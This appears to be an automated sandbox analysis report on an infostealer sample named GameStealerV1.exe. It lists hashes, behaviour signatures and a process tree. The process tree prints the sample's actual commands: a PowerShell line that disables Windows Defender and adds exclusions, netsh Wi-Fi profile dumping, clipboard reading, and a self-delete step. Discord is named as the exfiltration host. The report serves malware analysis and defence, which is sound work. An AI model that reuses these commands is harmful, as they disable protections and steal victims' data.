Analysis
-
max time kernel
31s -
max time network
34s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
25-05-2024 19:32
General
-
Target
GameStealerV1.exe
-
Size
19.7MB
-
MD5
81147138442b4d147c7cbed2c8043cf8
-
SHA1
6f42fd9daffee8b9816d2df0287010f310a62975
-
SHA256
cb31806a9dfbf19858779bb3a1b98efbcd2135eea4def247d99ce31c4d5bef8e
-
SHA512
f2772bef74ea468cdfd3dc4e4a210cb2e15fc3b7363066dacef13fa7565e46d48486b2a55b27fcd7b3b578644edb7f6daeb7ab79903b033c1cda08ba13d99bf5
-
SSDEEP
393216:Bh9Sl6eQnrh2Jp5M7V+C/pW/cRhuX2ByeZWiv8RR52HTy:L9kQrh1V+C/pWWuXulMoz
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepid process 2708 powershell.exe 1192 powershell.exe 3740 powershell.exe -
Drops startup file 2 IoCs
Processes:
GameStealerV1.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GameStealerV1.exe GameStealerV1.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GameStealerV1.exe GameStealerV1.exe -
Loads dropped DLL 51 IoCs
Processes:
GameStealerV1.exepid process 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI21562\python311.dll upx behavioral1/memory/4584-112-0x00007FF841A40000-0x00007FF842028000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI21562\_ctypes.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI21562\libffi-8.dll upx behavioral1/memory/4584-122-0x00007FF852160000-0x00007FF85216F000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI21562\_lzma.pyd upx behavioral1/memory/4584-145-0x00007FF851250000-0x00007FF851269000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI21562\_socket.pyd upx behavioral1/memory/4584-150-0x00007FF851DE0000-0x00007FF851DED000-memory.dmp upx behavioral1/memory/4584-155-0x00007FF851540000-0x00007FF85154D000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI21562\pywin32_system32\pythoncom311.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI21562\win32\win32api.pyd upx behavioral1/memory/4584-164-0x00007FF851470000-0x00007FF85149B000-memory.dmp upx behavioral1/memory/4584-163-0x00007FF8416D0000-0x00007FF84178C000-memory.dmp upx behavioral1/memory/4584-162-0x00007FF848270000-0x00007FF84829E000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI21562\pywin32_system32\pywintypes311.dll upx behavioral1/memory/4584-154-0x00007FF8482A0000-0x00007FF8482D5000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI21562\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI21562\pyexpat.pyd upx behavioral1/memory/4584-149-0x00007FF84FBC0000-0x00007FF84FBD9000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI21562\select.pyd upx behavioral1/memory/4584-146-0x00007FF8510C0000-0x00007FF8510ED000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI21562\_uuid.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI21562\_ssl.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI21562\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI21562\_overlapped.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI21562\_multiprocessing.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI21562\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI21562\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI21562\_cffi_backend.cp311-win_amd64.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI21562\_asyncio.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI21562\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI21562\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI21562\libssl-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI21562\libcrypto-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI21562\_bz2.pyd upx behavioral1/memory/4584-121-0x00007FF851110000-0x00007FF851134000-memory.dmp upx behavioral1/memory/4584-166-0x00007FF851300000-0x00007FF85132E000-memory.dmp upx behavioral1/memory/4584-171-0x00007FF841350000-0x00007FF8416C5000-memory.dmp upx behavioral1/memory/4584-170-0x00007FF8418C0000-0x00007FF841978000-memory.dmp upx behavioral1/memory/4584-174-0x00007FF854CC0000-0x00007FF854CD5000-memory.dmp upx behavioral1/memory/4584-182-0x00007FF840AA0000-0x00007FF840C13000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI21562\psutil\_psutil_windows.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI21562\charset_normalizer\md.cp311-win_amd64.pyd upx behavioral1/memory/4584-181-0x00007FF8512B0000-0x00007FF8512D3000-memory.dmp upx behavioral1/memory/4584-180-0x00007FF8512E0000-0x00007FF8512F2000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI21562\charset_normalizer\md__mypyc.cp311-win_amd64.pyd upx behavioral1/memory/4584-197-0x00007FF8509D0000-0x00007FF8509F6000-memory.dmp upx behavioral1/memory/4584-196-0x00007FF840980000-0x00007FF840A9C000-memory.dmp upx behavioral1/memory/4584-195-0x00007FF8513F0000-0x00007FF8513FB000-memory.dmp upx behavioral1/memory/4584-194-0x00007FF851110000-0x00007FF851134000-memory.dmp upx behavioral1/memory/4584-191-0x00007FF851270000-0x00007FF851284000-memory.dmp upx behavioral1/memory/4584-189-0x00007FF851290000-0x00007FF8512A8000-memory.dmp upx behavioral1/memory/4584-187-0x00007FF841A40000-0x00007FF842028000-memory.dmp upx behavioral1/memory/4584-201-0x00007FF84FBC0000-0x00007FF84FBD9000-memory.dmp upx behavioral1/memory/4584-208-0x00007FF8418C0000-0x00007FF841978000-memory.dmp upx behavioral1/memory/4584-207-0x00007FF851300000-0x00007FF85132E000-memory.dmp upx behavioral1/memory/4584-206-0x00007FF850890000-0x00007FF85089B000-memory.dmp upx behavioral1/memory/4584-222-0x00007FF841790000-0x00007FF84179D000-memory.dmp upx behavioral1/memory/4584-221-0x00007FF854CC0000-0x00007FF854CD5000-memory.dmp upx behavioral1/memory/4584-220-0x00007FF842890000-0x00007FF84289B000-memory.dmp upx behavioral1/memory/4584-219-0x00007FF847BD0000-0x00007FF847BDC000-memory.dmp upx behavioral1/memory/4584-218-0x00007FF8417A0000-0x00007FF8417AC000-memory.dmp upx behavioral1/memory/4584-225-0x00007FF840490000-0x00007FF840713000-memory.dmp upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
Processes:
flow ioc 32 discord.com 35 discord.com 36 discord.com 18 raw.githubusercontent.com 19 raw.githubusercontent.com 31 discord.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 14 api.ipify.org 15 api.ipify.org 34 api.ipify.org -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
GameStealerV1.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 4584 GameStealerV1.exe 1940 powershell.exe 1940 powershell.exe 5100 powershell.exe 5100 powershell.exe 2708 powershell.exe 2708 powershell.exe 1192 powershell.exe 1192 powershell.exe 3740 powershell.exe 3740 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
GameStealerV1.exeWMIC.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 4584 GameStealerV1.exe Token: SeIncreaseQuotaPrivilege 4396 WMIC.exe Token: SeSecurityPrivilege 4396 WMIC.exe Token: SeTakeOwnershipPrivilege 4396 WMIC.exe Token: SeLoadDriverPrivilege 4396 WMIC.exe Token: SeSystemProfilePrivilege 4396 WMIC.exe Token: SeSystemtimePrivilege 4396 WMIC.exe Token: SeProfSingleProcessPrivilege 4396 WMIC.exe Token: SeIncBasePriorityPrivilege 4396 WMIC.exe Token: SeCreatePagefilePrivilege 4396 WMIC.exe Token: SeBackupPrivilege 4396 WMIC.exe Token: SeRestorePrivilege 4396 WMIC.exe Token: SeShutdownPrivilege 4396 WMIC.exe Token: SeDebugPrivilege 4396 WMIC.exe Token: SeSystemEnvironmentPrivilege 4396 WMIC.exe Token: SeRemoteShutdownPrivilege 4396 WMIC.exe Token: SeUndockPrivilege 4396 WMIC.exe Token: SeManageVolumePrivilege 4396 WMIC.exe Token: 33 4396 WMIC.exe Token: 34 4396 WMIC.exe Token: 35 4396 WMIC.exe Token: 36 4396 WMIC.exe Token: SeIncreaseQuotaPrivilege 4396 WMIC.exe Token: SeSecurityPrivilege 4396 WMIC.exe Token: SeTakeOwnershipPrivilege 4396 WMIC.exe Token: SeLoadDriverPrivilege 4396 WMIC.exe Token: SeSystemProfilePrivilege 4396 WMIC.exe Token: SeSystemtimePrivilege 4396 WMIC.exe Token: SeProfSingleProcessPrivilege 4396 WMIC.exe Token: SeIncBasePriorityPrivilege 4396 WMIC.exe Token: SeCreatePagefilePrivilege 4396 WMIC.exe Token: SeBackupPrivilege 4396 WMIC.exe Token: SeRestorePrivilege 4396 WMIC.exe Token: SeShutdownPrivilege 4396 WMIC.exe Token: SeDebugPrivilege 4396 WMIC.exe Token: SeSystemEnvironmentPrivilege 4396 WMIC.exe Token: SeRemoteShutdownPrivilege 4396 WMIC.exe Token: SeUndockPrivilege 4396 WMIC.exe Token: SeManageVolumePrivilege 4396 WMIC.exe Token: 33 4396 WMIC.exe Token: 34 4396 WMIC.exe Token: 35 4396 WMIC.exe Token: 36 4396 WMIC.exe Token: SeDebugPrivilege 1940 powershell.exe Token: SeDebugPrivilege 5100 powershell.exe Token: SeDebugPrivilege 2708 powershell.exe Token: SeDebugPrivilege 1192 powershell.exe Token: SeDebugPrivilege 3740 powershell.exe Token: SeIncreaseQuotaPrivilege 1008 WMIC.exe Token: SeSecurityPrivilege 1008 WMIC.exe Token: SeTakeOwnershipPrivilege 1008 WMIC.exe Token: SeLoadDriverPrivilege 1008 WMIC.exe Token: SeSystemProfilePrivilege 1008 WMIC.exe Token: SeSystemtimePrivilege 1008 WMIC.exe Token: SeProfSingleProcessPrivilege 1008 WMIC.exe Token: SeIncBasePriorityPrivilege 1008 WMIC.exe Token: SeCreatePagefilePrivilege 1008 WMIC.exe Token: SeBackupPrivilege 1008 WMIC.exe Token: SeRestorePrivilege 1008 WMIC.exe Token: SeShutdownPrivilege 1008 WMIC.exe Token: SeDebugPrivilege 1008 WMIC.exe Token: SeSystemEnvironmentPrivilege 1008 WMIC.exe Token: SeRemoteShutdownPrivilege 1008 WMIC.exe Token: SeUndockPrivilege 1008 WMIC.exe -
Suspicious use of WriteProcessMemory 48 IoCs
Processes:
GameStealerV1.exeGameStealerV1.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2156 wrote to memory of 4584 2156 GameStealerV1.exe GameStealerV1.exe PID 2156 wrote to memory of 4584 2156 GameStealerV1.exe GameStealerV1.exe PID 4584 wrote to memory of 4924 4584 GameStealerV1.exe cmd.exe PID 4584 wrote to memory of 4924 4584 GameStealerV1.exe cmd.exe PID 4584 wrote to memory of 1812 4584 GameStealerV1.exe cmd.exe PID 4584 wrote to memory of 1812 4584 GameStealerV1.exe cmd.exe PID 1812 wrote to memory of 4396 1812 cmd.exe WMIC.exe PID 1812 wrote to memory of 4396 1812 cmd.exe WMIC.exe PID 4584 wrote to memory of 3112 4584 GameStealerV1.exe cmd.exe PID 4584 wrote to memory of 3112 4584 GameStealerV1.exe cmd.exe PID 3112 wrote to memory of 2300 3112 cmd.exe netsh.exe PID 3112 wrote to memory of 2300 3112 cmd.exe netsh.exe PID 4584 wrote to memory of 4380 4584 GameStealerV1.exe cmd.exe PID 4584 wrote to memory of 4380 4584 GameStealerV1.exe cmd.exe PID 4380 wrote to memory of 1940 4380 cmd.exe powershell.exe PID 4380 wrote to memory of 1940 4380 cmd.exe powershell.exe PID 4584 wrote to memory of 4780 4584 GameStealerV1.exe cmd.exe PID 4584 wrote to memory of 4780 4584 GameStealerV1.exe cmd.exe PID 4780 wrote to memory of 5100 4780 cmd.exe powershell.exe PID 4780 wrote to memory of 5100 4780 cmd.exe powershell.exe PID 4780 wrote to memory of 2708 4780 cmd.exe powershell.exe PID 4780 wrote to memory of 2708 4780 cmd.exe powershell.exe PID 4780 wrote to memory of 1192 4780 cmd.exe powershell.exe PID 4780 wrote to memory of 1192 4780 cmd.exe powershell.exe PID 4780 wrote to memory of 3740 4780 cmd.exe powershell.exe PID 4780 wrote to memory of 3740 4780 cmd.exe powershell.exe PID 4584 wrote to memory of 2820 4584 GameStealerV1.exe cmd.exe PID 4584 wrote to memory of 2820 4584 GameStealerV1.exe cmd.exe PID 2820 wrote to memory of 1008 2820 cmd.exe WMIC.exe PID 2820 wrote to memory of 1008 2820 cmd.exe WMIC.exe PID 4584 wrote to memory of 3604 4584 GameStealerV1.exe wmic.exe PID 4584 wrote to memory of 3604 4584 GameStealerV1.exe wmic.exe PID 4584 wrote to memory of 4996 4584 GameStealerV1.exe cmd.exe PID 4584 wrote to memory of 4996 4584 GameStealerV1.exe cmd.exe PID 4996 wrote to memory of 2368 4996 cmd.exe WMIC.exe PID 4996 wrote to memory of 2368 4996 cmd.exe WMIC.exe PID 4584 wrote to memory of 4504 4584 GameStealerV1.exe cmd.exe PID 4584 wrote to memory of 4504 4584 GameStealerV1.exe cmd.exe PID 4504 wrote to memory of 4724 4504 cmd.exe WMIC.exe PID 4504 wrote to memory of 4724 4504 cmd.exe WMIC.exe PID 4584 wrote to memory of 4132 4584 GameStealerV1.exe cmd.exe PID 4584 wrote to memory of 4132 4584 GameStealerV1.exe cmd.exe PID 4132 wrote to memory of 3616 4132 cmd.exe WMIC.exe PID 4132 wrote to memory of 3616 4132 cmd.exe WMIC.exe PID 4584 wrote to memory of 3656 4584 GameStealerV1.exe cmd.exe PID 4584 wrote to memory of 3656 4584 GameStealerV1.exe cmd.exe PID 3656 wrote to memory of 3920 3656 cmd.exe PING.EXE PID 3656 wrote to memory of 3920 3656 cmd.exe PING.EXE
Processes
-
C:\Users\Admin\AppData\Local\Temp\GameStealerV1.exe"C:\Users\Admin\AppData\Local\Temp\GameStealerV1.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Users\Admin\AppData\Local\Temp\GameStealerV1.exe"C:\Users\Admin\AppData\Local\Temp\GameStealerV1.exe"2⤵
- Drops startup file
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4584 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"3⤵PID:4924
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\System32\wbem\WMIC.exeC:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4396 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profiles"3⤵
- Suspicious use of WriteProcessMemory
PID:3112 -
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵PID:2300
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1940 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "3⤵
- Suspicious use of WriteProcessMemory
PID:4780 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5100 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1192 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3740 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1008 -
C:\Windows\System32\Wbem\wmic.exewmic cpu get Name3⤵PID:3604
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:4996 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:2368 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵
- Suspicious use of WriteProcessMemory
PID:4504 -
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:4724
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:4132 -
C:\Windows\System32\wbem\WMIC.exeC:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid4⤵PID:3616
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /F "C:\Users\Admin\AppData\Local\Temp\GameStealerV1.exe""3⤵
- Suspicious use of WriteProcessMemory
PID:3656 -
C:\Windows\system32\PING.EXEping localhost -n 34⤵
- Runs ping.exe
PID:3920
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9KB
MD51a48e6e2a3243a0e38996e61f9f61a68
SHA1488a1aa38cd3c068bdf24b96234a12232007616c
SHA256c7b01a0290bc43910ee776bd90de05e37b77f5bd33feaf7d38f4c362e255e061
SHA512d7acd779b7cab5577289511f137dc664966fcaac39748e33ca4d266a785b17766106944df21c8f2452fd28e008529f3e0097282ad3c69f1069a93df25c6da764
-
Filesize
96KB
MD5f12681a472b9dd04a812e16096514974
SHA16fd102eb3e0b0e6eef08118d71f28702d1a9067c
SHA256d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8
SHA5127d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2
-
Filesize
37KB
MD575e78e4bf561031d39f86143753400ff
SHA1324c2a99e39f8992459495182677e91656a05206
SHA2561758085a61527b427c4380f0c976d29a8bee889f2ac480c356a3f166433bf70e
SHA512ce4daf46bce44a89d21308c63e2de8b757a23be2630360209c4a25eb13f1f66a04fbb0a124761a33bbf34496f2f2a02b8df159b4b62f1b6241e1dbfb0e5d9756
-
Filesize
34KB
MD5b42a92003d73446d40da16e0f4d9f5ee
SHA13742fb1b2302864181d1568e3526aa63bd7db2c5
SHA2566b12b8a4a3cdc802e53918ad30296fb4c9da639595463eb6249406e9256ffaa3
SHA5127fd42f1aa5c96fcc1f5ed7289d4f9a1845174e47112dfa95ebbb23e22ab7ef93ad537f1b5dc9415ba78d71a84bcbeac35d9f27f202c4cd81d855907e1d90f91c
-
Filesize
46KB
MD581578115dd99002ccdd4095b1152db1b
SHA1e497a0761f2ac9eeba50e78e2d2f4c2349babcf2
SHA25627b6bf8412d7b660939f31aeedd87585878470b7586a4361f0dccdadd7d64b45
SHA512b468f71b15cf92164cee6b81bd840864d1d795b86ba3fb33317c4ec89959d5f10b62530a4edf8960e93741af54500a062c0713ab3a0d9ff929e6389633538796
-
Filesize
71KB
MD5c1cd1d53ddfe5033a341f0c2051c4357
SHA1b205344ada67dc82d208baf2d6b9cda4a497abea
SHA25644381ffef40a5e344ca951de08f13fb4e25096c240d965acfaa47221b9f9ef52
SHA512d4f509cfb8fa1f044ff4b0b55c5298ead40fd635cfb5a6c7d779a66eeb5f52d3e30a5b3e61507f2891e9ef1070e0c8eea1b698b680048fbb7cb5f15f4e26d309
-
Filesize
57KB
MD587e8cc70c59737ce8e248a35550086e6
SHA1082b43a944ca3739602d0edf96e37784d32fc509
SHA256e8a40dfc0d412329d8192d78bcd3d12199ef3551b61dcfa3eb852f86ac49a493
SHA512d418f1cf437f4dd8797bedc7b909d2433ea03fecaadb34135db13d0eb34b9b16aedd1c340c4a5670fb05df420636a83ab704c0432a605cf5e95e9ebe87ef2a2b
-
Filesize
104KB
MD582ae89cf9d47eda296253e6a4b3bacd8
SHA15b593f3d8afe484b0afec866643b26b14cfef05b
SHA2565dbd333752ed7a1767c8b67d3a6d36ff141b8752dfbdd70386341b4f55fae3dd
SHA512245c6fd4a64c17e7936ad9a84299a7f5c4ef93ac2b1dcb86cccb10a7d51e443c3afd47822eb3962d37292015c34cef76f394c41b680b154ed18223b2e20c32f0
-
Filesize
33KB
MD544288ccbdf7e9b62b2b8b7c03257a8e8
SHA1fe70c375cc865a5abcee331c069d4899604cfe1a
SHA256d7cd29693e5632ee2e91b1f323b8eb5c20b65116e32c918a42c0da6256d83f9d
SHA512ab517968ac5662221cb0b52d17a05211c601af17704c625c2f6d4fbce33b20f26a041a86707450297f1f3a4384589223cd8be7a482a7c37a516a2957dade0aac
-
Filesize
84KB
MD5351034ddaaf1234458e65b90c4189eb3
SHA1246dc4c5011f9cb2b0c85e453f9276190a1b6c6e
SHA2563af3703e458370997679dca6c2241a1fa1c799248c4e092e614e2c103690d23b
SHA51218f110d73cf876638b72e2a877059f52e4cef4e2c2ff877b1bdd21747364f9f5a339a6d349a941e0a0fefa98e3e34ce5689a66caa1378f3c3ebcdf607a87eb13
-
Filesize
25KB
MD5d629edf1d6af8567aea57dab640b4174
SHA1f920e358c0c429e87fe9ba4f34d8fd89996e82ea
SHA2562487e57feac587a079879325fd447a48731ebd9c311e8553fd2a5dd60864068a
SHA51229218a3adfe1d4a0a4bf6c22bf55d189e0836b45efad96b7a8eeede379e6918599c90a4c4c5185309e5991710b2162ec9e2c9fa50a62e31aaace380dfa7c03df
-
Filesize
30KB
MD5490665d832ff3c369fe9fc5aa9381288
SHA1d5575d0ae9bcba972ecd928762db79f39f843ecf
SHA256a5a1152e8ea3e16fe5bd5649216e36680a2afc03a1cf4c53c95c61db853375aa
SHA51257124e754b112059219d4771d055f113e9af3d8086ab3b330ff0828224a82924f08fa863f009c653a789194bd93bfd4139cf0aad0d39c3896b3c15cbba754e7a
-
Filesize
24KB
MD57ae2d836bf4420edc6a1213912074fcb
SHA1bb9c4d90cc380c53082f77378f9f0ad2521efd6c
SHA2564cd5f1721cb141f2b1cf79ed22b3fa873ff626b709c51f1d8b5f724ebe6533bc
SHA512ed3785ec37deffdba391563daffde38af7dc33c2f2ff00b6420a04c7f99c9536168c9cc83fffa443948aa2c764fbd6ccd1b24dde3f7e51680225729e54b4e4da
-
Filesize
41KB
MD566ae8b5b160df4abffaf34c40adfe96b
SHA1c86be1817815da8bc105a4b5dc49de61ef205577
SHA256f87523cbfb071062d1988267373f8b66195a29e102d03c2e119f2f94e66b1f94
SHA5125e1ca8e4214572422062d60f52746d57f2f55da2b39d73a4e108005859812f10c1bc40b8ac68019154c927427e43c76b7a6bff77a57c915b1122738c5a1264d7
-
Filesize
54KB
MD52d78ce9e29b899cfca2684baacde5b25
SHA13c36b7ed168359a4c4375f0ae0141856cfa85203
SHA2566d9f1d418adb30f53fb646848c16787b05ba6d9dffa22597d03bc2e49e80f3be
SHA51215a62a0008f3749125dbc07ec3558bc7724e77e2ffa12989e6c4207e3f61ce01d7a0d715afc78057767593a8947449de087edb5a954a8ac5bdfb946d0fdee5bd
-
Filesize
60KB
MD5917d1f89ffc7034efd9e8b6735315f01
SHA1873d7aea27390959988cd4ff9f5206339a6694ea
SHA25698818be47ef29fb5a3e7a774ace378fdb0b5822d7e877f0071f6b0654557b2b8
SHA512744f2a85c16a0bfe54299898728c8bf3d8984ceb693fee5b0e6de9dd4fc5ea66b58633c599b0dc67022c916b99ce17a4b86430215c8973336df94c8debf508eb
-
Filesize
21KB
MD581d18c8d2dbd64bf5518d9d389c18e37
SHA128f240ab3b5d23c5148aaff2752d1c93b9a82580
SHA2563e59b1b0e920a492ceda8785d8e1a61cdcb392b9e68a79011024f0a2af36fb7a
SHA5127dd9635189be0ff4991ea733a45ca166d98314f305da22da1589119cd7009ff25e12057303371b863a70fb1baaa7a8b05c9ac5178cea4c812532d281ebacaaa6
-
Filesize
1.4MB
MD583d235e1f5b0ee5b0282b5ab7244f6c4
SHA1629a1ce71314d7abbce96674a1ddf9f38c4a5e9c
SHA256db389a9e14bfac6ee5cce17d41f9637d3ff8b702cc74102db8643e78659670a0
SHA51277364aff24cfc75ee32e50973b7d589b4a896d634305d965ecbc31a9e0097e270499dbec93126092eb11f3f1ad97692db6ca5927d3d02f3d053336d6267d7e5f
-
Filesize
9KB
MD53275f09e1d0e6b62848142457e500909
SHA1a7d85bc1b3edd7cf26c88c5730105788702fe260
SHA256cce797bfba0afdac27705a11f04427092c5c9f5ea14b7da329c2b76904ff3e2f
SHA5126651c3c2cf301d885f1821c8b626b13f723f3b3936d99785ad84b9ea2779115c724cfcae9ed1ec87589719779d971a692c4034c9e149108b493de930f395286c
-
Filesize
39KB
MD54261454f3bd706539298b0cf68f4fc74
SHA1d1a3e574fe1fa93e7b3d2ff73198c62036b9ccec
SHA2569ffc8239c0c136b090ab7bf16590198151aa5fd66a24f063bc9949bc9c213a93
